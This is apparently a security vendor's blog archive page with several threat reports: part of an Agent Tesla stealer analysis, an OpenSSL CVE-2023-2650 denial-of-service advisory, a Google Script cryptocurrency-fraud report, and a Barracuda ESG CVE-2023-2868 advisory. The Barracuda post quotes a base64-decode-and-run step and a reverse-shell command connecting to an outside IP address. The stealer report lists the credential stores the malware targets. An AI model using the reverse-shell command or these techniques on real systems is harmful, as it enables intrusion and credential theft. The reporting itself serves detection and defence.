On 64-bit system Shellcode executes some API’s using Syscall instruction that are used for Process Hollowing. On 32-bit same APIs are using Sysenter instruction.

Fig 5. 64-bit Code, Syscall through Heaven’s Gate

This layer serves as loader to begin the execution of native loader.

Native Loader

Layer 2 shellcode decrypts an encrypted native C++ loader and start its execution. This Agent Tesla variant has a noteworthy difference from previously examined variants, in this variant Agent Tesla is loaded via a native C++ loader instead of multiple stages of .net assembly modules.

Native loader stores the final payload Agent Tesla in its resource’s directory. The Common Language Runtime is integrated by the loader via CLR Hosting Interfaces in order to load and run .Net assemblies. Mscoree DLL implements functions that is used for CLR hosting.

Fig 6. API’s call sequence to load .Net managed assembly from unmanaged code.

This native loader injects the final Agent Tesla payload in newly created process and start its execution.

Technical Analysis of Agent Tesla

Capabilities of Agent Tesla

This recent version of Agent Tesla harvest variety of sensitive data from a wide selection of browsers, VPN, FTP , Email clients and more. Sensitive data of the application includes its credentials, “\user data” directory of particular browser, Cookies from browser and FTP application, Configuration data.

  • Data Harvesting 
    • Browsers: IE/Edge, UC Browser, Safari for Windows, QQ Browser, Falkon Browser, Flock Browser, Opera Browser, Yandex Browser, Iridium Browser, Chromium, 7 Star, Torch Browser, Cool Novo, Chrome Plus, Kometa, Amigo, Brave, Cent Browser, Chedot, Orbitum, Sputnik, Comodo Dragon, Vivaldi, Citrio, 360 Browser, Uran, Liebao Browser, Elements Browser, Epic Privacy, Cốc Cốc browser, Sleipnir 6, QIP Surf, Coowon, Google Chrome, Edge Chromium, Firefox, SeaMonkey, BlackHawk , CyberFox, K-Meleon, IceCat, Pale Moon, IceDragon, WaterFox, Postbox
    • Email clients: Eudora, The Bat, Becky, Outlook, Windows Mail App, FoxMail, Opera Mail, PocoMail, eM Client, Mailbird, Thunderbird,  Claws,  IncrediMail.
    • FTP/SCP clients: FileZilla, CoreFTP, WinSCP, Flash FXP, FTP Navigator, SmartFTP, WS_FTP, FtpCommander, FTPGetter.
    • Databases: Berkelet DB, MySQL Workbench.
    • VPN clients: NordVPN, OpenVPN, Private Internet Access VPN.
    • Virtual network computing clients: RealVNC, WinVNC3, TightVNC, UltraVNC.
    • Instant Messaging programs: Discord, Paltalk, Pidgin, Psi/Psi+, Trillian
    • Dynamic DNS clients: DynDns
    • Download Managers: JDownloader, Internet Downloader Manager
    • Windows Credentials: Windows Secure Note, Windows Web Password Credential, Windows Credential Picker Protector, Web Credentials, Windows Credentials, Windows Domain Certificate Credential, Windows Domain Password Credential, Windows Extended Credential
  • Keystrokes logging
  • Clipboard Scraping
  • Screenshot Capturing
  • Deleting Zone identifier
    • Agent Tesla deletes Zone Identifer to remove its trace that origin of file is untrusted source.

      Fig 7. Deleting Zone identifier

Fingerprinting

Agent Tesla uses Computer name, Operating System , Processor name, Total memory, Current date and time , IP Address, Internet connectivity and Username, MacAddress, Serial Number for fingerprinting.

Persistence

Agent Tesla achieves persistence by adding two autorun registry keys.

  • Software\Microsoft\Windows\CurrentVersion\Run
  • SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run

Exfiltration

Normally Agent Tesla exfiltrate collected data via FTP, HTTP, SMTP and Telegram bot, but in this variant it only uses SMTP to exfiltrate data.

Malware uses compromised email account to exfiltrate collected data to mail server which is being managed by the attacker.

The above discussed techniques are similar in most of the .Net stealers. The SonicWall research team has provided a full explanation for above techniques in Unmasking .Net Stealer and Redline blog posts.

Configuration Data

Agent Tesla keeps its configuration data encoded.

Fig 8. Agent Tesla’s Decoded Configuration Data

Evolution of String decryption Algorithm

In this section we will discuss the evolution of string decryption algorithms of Agent Tesla.

Agent Tesla is actively changing its tactics to hide from security software’s. One of the tactics is string encryption, it is crucial to keep them hidden from security software and reverser’s. All the important configuration data and ioc’s such as browser names  list, c2 host name, smtp credentials in Agent Tesla are stored as encrypted strings.

Version 1

In this version encrypted strings are stored as base64 encoded.

The SHA1 hashing algorithm is used by decryption function “s_method_0” to generate a key using a hardcoded password and salt. The base64 decoded string is then decrypted with the AES algorithm using CBC mode using the generated key and hardcoded IV.

Fig 9. AES Decryption Function(bottom), example of encrypted string(top)

Version 2

In this version Agent Tesla uses AES algorithm in CBC mode same as in version 1 but it uses different Key and IV for each decryption the string. Strings are stored in an array of object, where each object has three elements that are an encrypted string, Key and IV.

 

Fig 10. AES Decryption Function(bottom), example of encrypted string(top)

Version 3

In this version Agent Tesla implements simple Xor decryption. Xored strings are stored in array of bytes.

Decryption function is defined in .cctor() constructor of binary file. When malware starts its execution, its constructor gets called automatically and it decrypts an encrypted string array using hardcoded Xor byte-size key. To locate an exact string malware uses array offset and size of string as there is no separator between strings.

Fig 11. Simple Xor decryption(bottom), example of encrypted string(top)

Version 4

In this version Agent Tesla author has copied and abused an open-source .NET string encryption tool XorStringsNET .

In this version strings are stored as encrypted data blob. Data blob has below format.

As per .NET file format data blob is stored as field of structure as shown below.

Fig 12. Data blob stored as structure with size of =19953 bytes

Approach for string decryption

1) We can use de4dot tool to automatically decrypt the strings and get binary file with strings are decrypted. It comes with multiple options to manipulate the .Net binary file.

Consider below command as example to decrypt the strings.

de4dot.exe -f file -o outfile –strtyp delegate –strtok 0x6000001

strtok – Enter the method token of the Decryption method. We can get it easily using DnSpy.

Fig 13. de4dot cmdline options

strtyp – This option can be one of the below methods.

Fig 14. String decrypter type available

2) Python Scripts by parsing .Net metadata.

Writing python script to decrypt strings automatically, we need to find required data as below.

  • .Net metadata – Parse required metadata such as Method/Structure Token, RVA, File offset required for string decryption.

Many open source .Net parsing libraries are available on Github.

Conclusion

Agent Tesla RAT has been active from several years and it is continuing to evolve. It has developed new ways such as use of native C++ loader for evading detection. Agent Tesla is successfully able to harvest and exfiltrate data to the attacker. In each version Agent Tesla continues to improve its string encryption functions and addition into its data stealing capability catalog . We expect major improvements in the next version of it.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AgentTesla.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

IOC’s

D63FE952E90788072C6166A39BDE21B5 – NSIS Installer

B67E8512632AAE047A483B643EA6B1B4 – NSIS Plugin DLL

F8F2ED5A4E1FB2F14D49349CE4E2B779 – Encrypted Stage 2

57B264BF971F2BCF62140130CFD94CF5 – C++ Loader

A0A5B08B0EFFF9FAA96455B699893F76 – Agent Tesla

OpenSSL OBJ_obj2txt Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  OpenSSL stands as a renowned open-source library, primarily utilized for SSL and TLS. The Secure Socket Layer (SSL) and the Transport Layer Security (TLS), referenced interchangeably from this point onward, are cryptographic protocols designed to ensure communication security, data integrity, and authentication over TCP/IP networks. By harnessing the power of cryptography primitives—symmetric key ciphers, cryptographically robust hash functions, and the Public Key Infrastructure (PKI)—these protocols facilitate secure communication between hosts over unsecured networks.

  PKI, a prevalent authentication system for TLS, is dependent on certificates for conveying necessary cryptographic data, such as RSA keys, signatures, and identity information, all vital for encryption and authentication. The ITU standard, X.509, details the structure of these public-key certificates.

  There are three existing versions of X.509: X.509 v1 and v3 are older and newer standards, respectively, utilized for certificate representation. Conversely, X.509 v2 outlines the standard for representing Certificate Revocation Lists (CRLs). These certificate representations are outlined using Abstract Syntax Notation One (ASN.1) and encoded via the Distinguished Encoding Rules (DER).

  Recently, a denial-of-service vulnerability has been discovered in the OpenSSL library. This vulnerability emanates from delays encountered during the processing of ASN.1 OBJECT IDENTIFIERs.

  A remote attacker can exploit this vulnerability by transmitting specially crafted packets to an OpenSSL client, or a server that has purposefully activated client authentication. Should this exploitation prove successful, it could instigate denial-of-service conditions on the impacted service.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2650.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 4.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:U/RL:O/RC:C).

  Base score is 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is none.
    • Impact of this vulnerability on data integrity is none.
    • Impact of this vulnerability on data availability is low.
  Temporal score is 4.6 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  It’s important to shed light on the OBJECT IDENTIFIER tag and its workings. The OBJECT IDENTIFIER data type, encoded into a TLV (Type, Length, Value) triplet, commences with a Tag value of 0x06. The encoding of each integer in a dotted decimal object identifier (OID) is governed by a set of specific rules. First and foremost, the OID’s initial two nodes are encoded onto a solitary byte, with the first node being multiplied by the decimal 40 and the result is added to the second node’s value. Secondly, node values that are either equal to or less than 127 are encoded on a single byte. Lastly, node values that are equal to or exceed 128 are encoded on multiple bytes, with Bit 7 of the leftmost byte set to one and Bits 0 through 6 of each byte containing the encoded value.

  For illustration, consider the OBJECT IDENTIFIER “1.3.6.1.4.1.311.21.20”. It would be encoded as follows: “06 09 2b 06 01 04 01 82 37 15 14”. Here, “06” stands for the OBJECT IDENTIFIER tag, “09” represents the length of the OBJECT IDENTIFIER, and the subsequent bytes are the encoded values, utilizing the previously mentioned three rules.

  OpenSSL library incorporates support for parsing ASN.1 encoded OBJECT IDENTIFIER in DER format. More specifically, it provides an API known as OBJ_obj2txt() for data parsing. This function commences decoding from the first byte, interpreted as the two initial sub-identifiers, as per Rule 1. Post this, the function scrutinizes each byte of the remaining encoded data in a while loop. The value will be directly regarded as the decimal sub-identifier if it’s less than 0x80 (128), aligning with Rule 2. If the value equals or exceeds 0x80, the function discards Bit 7, storing only the left 7 bits (Bits 6 – 0), and repeats this step in a for loop until a byte less than 0x80 is encountered. The function then concatenates all the lower 7 bits in these bytes and converts the bit stream into an integer. This integer’s decimal value will be the sub-identifier. Nevertheless, this function does not impose restrictions on the length of the encoded OBJECT IDENTIFIER data. Consequently, the decoding step could be extensively time-consuming if the concatenated value forms a large integer.

Triggering the Problem:

  • The target must be running a vulnerable version of the affected product.
  • The attacker must have the ability to delivery a malicious ASN.1 DER file to the target

Triggering Conditions:

  The vulnerability can be exploited if the attacker successfully delivers a malicious certificate or any other file in DER format to applications utilizing the OpenSSL library. The vulnerability is subsequently triggered upon the parsing of this malicious file, establishing a potential security risk for the system.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • FTP
    • HTTP
    • HTTPS
    • IMAP
    • NFS
    • POP3
    • SMB/CIFS
    • SMTP
    • ESMTP
    • SIPS

  Get Request:
  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS:19207 OpenSSL OBJ_obj2txt Function DoS

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Apply the vendor-provided patch to eliminate the vulnerability.
    • Filter attack traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Google script being abused for Cryptocurrency fraud

/in /by

SonicWall Capture Labs Research team has discovered an ongoing instance of cryptocurrency fraud that utilizes legitimate Google services, specifically Google Script macros. Threat actors intentionally target these platforms because they are both convenient to use and malicious code can evade detection by anti-malware systems.

Google Script macros are primarily designed to enhance productivity and streamline workflows within Google services. However, threat actors are now exploiting them for fraudulent purposes, finding ways to execute malicious code within the context of legitimate Google applications.

In this case, a PDF file is being circulated, containing a malicious URL that was created using Google Script. Once the user interacts with this URL, they are redirected to the actual fraudulent website.

Fig: PDF File

 

Below shown the response to the malicious URL using Google Script Macro.

Fig: Fiddler capture of malicious Google Script Macro

 

When the URL in the PDF file opens it shows Google’s message that this application was created by another user not by Google when clicked on the webpage it redirects to office[.]proprogramvipt[.]top

Fig: Google script malicious URL

 

After redirection, On this deceptive webpage, user is confronted with a warning message indicating that their account is at risk of deletion due to inactivity. To add a sense of urgency, a countdown timer is displayed, suggesting that the account will be deleted imminently.

In order to prevent the account deletion and purportedly withdraw the funds (which, in reality, are non-existent), user is instructed to sign in.

Fig: Warning for account deletion

 

Upon signing in, user is presented with a prepopulated sign-in page that appears legitimate. The page is carefully designed to create an enticing welcome-back message, which includes displaying the user’s Bitcoin balance in both BTC and USD values. This serves as bait to lure user into continuing further with the process.

Fig: Sign-in & welcome message

 

To create an illusion of authenticity, various elements that mimic legitimate features commonly found on cryptocurrency platforms are presented. These elements include:

History: A fabricated transaction history is displayed, showcasing previous transactions to make the platform appear genuine.

User Chat: Fictitious comments and messages from fake users are shown, attempting to simulate user activity and engagement on the platform.

Settings: Users are provided with an option to collect bitcoins, along with the ability to change their password. This is aimed at giving the impression of user control and customization.

News: Fake news articles are presented, falsely claiming updates such as a switch to a new cryptocurrency system, the addition of PayPal payouts, or technical server-related updates. These news pieces aim to instill a sense of credibility and innovation.

All of these elements are carefully designed to create an atmosphere of legitimacy and trust, further deceiving users into believing that the fraudulent platform is genuine and reliable.

 

Fig: News, Settings, Chat & History

 

It shows the current balance in BTC & USD with a button to collect bitcoin bonuses.

 

Fig: Collect BTC Bonuses

 

After clicking the “Collect Bitcoin Bonuses” button it shows a progress bar as if mining is going on the system with fake transaction hashes.

Fig: Fake mining

 

Once the progress bar reaches 100% it shows collected BTC and a get paid button.

 

Fig: BTC collection

 

After clicking get paid it asks for the user’s personal details along with account/card details.

 

Fig: User’s details

 

After getting all the details shows forwarding the details to the manager and they have their own chatbot which says details are verified without any validation even if random input is given.

Fig: Chatbot

Then for currency exchange, it redirects to BTC pay & the user has to pay in bitcoin.

 

Fig: BTCPay

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: CryptoFraud.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

 

Indicators of Compromise (IOC):

671ea7c95223fc15b2dbe03bc55acc44d81f0f69c1a3686c9f8db174df3e2710

Barracuda ES Gateway Reverse Shell Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  The Barracuda Email Security Gateway is a comprehensive email security solution developed to safeguard businesses from a multitude of email threats such as spam, viruses, phishing, DoS attacks, and data leaks. It is available in physical and virtual forms and offers thorough inbound and outbound email filtering, data leak prevention, and email encryption. It also boasts advanced features like protection against sophisticated threats like ransomware and zero-day attacks. In addition, it employs an outbound filtering system to avert data loss and uphold the reputation of your email server’s IP address.

  The appliance form factor of the Barracuda Email Security Gateway pertains to its physical variant, a standalone device installable directly into an organization’s network infrastructure.

  A remote command injection vulnerability has been discovered in the Barracuda Email Security Gateway product, affecting versions 5.1.3.001 to 9.2.0.006. This vulnerability stems from an insufficient sanitization process of .tar files (tape archives).

  This vulnerability could be exploited by a remote, unauthenticated attacker by sending a specially crafted TAR file to the targeted device. A successful attack could result in a reverse shell against the targeted server, thus compromising its security.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2868.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.8 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  Inside the TAR file, you will see the following string:
  
  The script provided is a shell command that decodes a base64 encoded string and then executes the result. Here’s a detailed breakdown of what the command does:

  • abcdefg=: This sets the variable abcdefg to a base64 encoded string.
  • ee=ba: This sets the variable ee to the string ba.
  • G=s: This sets the variable G to the string s.
  • "ech"o $abcdefg|${ee}se64 -d|${G}h: This part of the command is using some obfuscation. If we substitute ee with ba and G with s, we get "ech"o $abcdefg | base64 -d | sh.
    1. "ech"o $abcdefg: This echoes the base64 encoded string stored in abcdefg.
    2. base64 -d: This decodes the base64 encoded string.
    3. sh: This executes the resulting decoded command string using sh.
  • wh66489.txt: This command doesn’t seem to have any context related to the rest of the script and it doesn’t appear to be a valid command by itself. If it was intended to redirect the output to a file named wh66489.txt, then it would require a > before the filename like this > wh66489.txt.

 If we decode the base64 string abcdefg using the command "ech"o $abcdefg | base64 -d, we get:

 This command is creating a reverse shell that connects to a specified host 107.148.223.196:443 over a secure SSL/TLS connection.

 The breakdown of the reverse shell commands:

  • setsid: This command is used to run a new session in Unix and Unix-like operating systems. This ensures that the command continues running even if the terminal is closed.
  • sh -c: The sh -c command is used to run a shell (sh) with a command string (-c option). Here, the string within the quotes is the command string that sh is going to execute.
  • mkfifo /tmp/p: The mkfifo command creates a named pipe with the name /tmp/p. Pipes are used to direct the output from one command as input to another. Named pipes, like /tmp/p, can be used by multiple processes for communication.
  • sh -i < /tmp/p 2>&1|openssl s_client -quiet -connect 107.148.223.196:443 > /tmp/p 2>/dev/null: This is a compound command.
    1. sh -i < /tmp/p 2>&1: The sh -i command starts an interactive shell. The < /tmp/p redirects the input of this shell from the named pipe we created earlier.
    2. The 2>&1 redirects standard error (2) to standard output (1).
    3. Therefore, both the error messages and standard output from the sh -i command are sent to the pipe /tmp/p.
    4. The | character pipes the output from the preceding command as the input to the next command.
    5. openssl s_client -quiet -connect 107.148.223.196:443: The openssl s_client command starts a SSL/TLS client that connects to an SSL/TLS server. The -quiet option suppresses most of the output. The -connect option specifies the host and port to connect to, here 107.148.223.196:443.
    6. > /tmp/p 2>/dev/null: This part is redirecting the standard output to the named pipe (/tmp/p) and discarding the standard error by directing it to /dev/null.
  • rm /tmp/p: Finally, after the connection is terminated, this command removes the named pipe /tmp/p.

 The overall purpose of this command is to create a reverse shell that connects to a specified host 107.148.223.196:443 over a secure SSL/TLS connection. The connection is kept alive even if the terminal is closed due to the setsid command.

Triggering the Problem:

  • The target system must have the Barracuda Email Security Gateway versions 5.1.3.001-9.2.0.006.
  • The attacker must have network connectivity to the affected ports.
  • The attacker must send malicious attachments designed to exploit CVE-2023-2868 to gain initial access.

Triggering Conditions:

  For emails targeting Barracuda Email Security Gateway middleboxes and transmitted over SMTP or ESMTP, it is crucial to attach files with the extension ".tar" in their filename. Alternatively, using other extensions such as ".jpg" or ".dat" is acceptable, as long as they contain valid ".tar" file content for exploitation.

  Note that ".tar" file attachments crafted as valid exploits have the potential to execute a reverse shell payload on certain ESG appliances during the email attachment screening process.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • SMTP
    • ESMTP
  Exploit chain related malware components will be installed over HTTP/HTTPs.

  Reverse Shell File Content:
  

SonicWall's, Capture Labs, provides protection against this threat:

  • GAV: 18479 CVE-2023-2868.A

  • GAV: 17928 Saltwater.A

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Filtering traffic based on the signature above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory #1
  Vendor Advisory #2